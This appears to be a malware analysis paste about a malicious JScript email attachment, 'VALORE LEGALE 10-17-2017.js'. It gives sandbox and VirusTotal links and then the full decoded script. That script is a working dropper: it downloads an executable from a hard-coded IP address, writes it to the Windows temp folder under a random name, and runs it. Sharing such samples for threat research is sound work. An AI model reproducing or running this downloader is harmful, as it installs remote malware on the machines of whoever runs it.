VALORE LEGALE 10-17-2017.js

1. Encoded file: https://www.reverse.it/sample/35516855e1ca3a638afa09af0e0771d6eff3a91ec8d01899c8840d397ceed501
2.  
3. VirusTotal: https://www.virustotal.com/#/file/35516855e1ca3a638afa09af0e0771d6eff3a91ec8d01899c8840d397ceed501/detection
4.  
5. Decoded script:
6.  
7. var ws = new ActiveXObject("WScript.Shell");
8. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
9. var dn = 0;
10. var xo = new ActiveXObject("MSXML2.XMLHTTP");
11. xo.onreadystatechange = function() {
12.     if (xo.readyState == 4 && xo.status == 200) {
13.         var xa = new ActiveXObject("ADODB.Stream");
14.         xa.open();
15.         xa.type = 1;
16.         xa.write(xo.ResponseBody);
17.         if (xa.size > 5000) {
18.             dn = 1;
19.             xa.position = 0;
20.             xa.saveToFile(fn, 2);
21.             try {
22.                 ws.Run(fn, 1, 0);
23.             } catch (er) {};
24.         };
25.         xa.close();
26.     };
27. };
28. try {
29.     xo.open("GET", "http://89.45.67.144/onore.exe", false);
30.     xo.send();
31. } catch (er) {};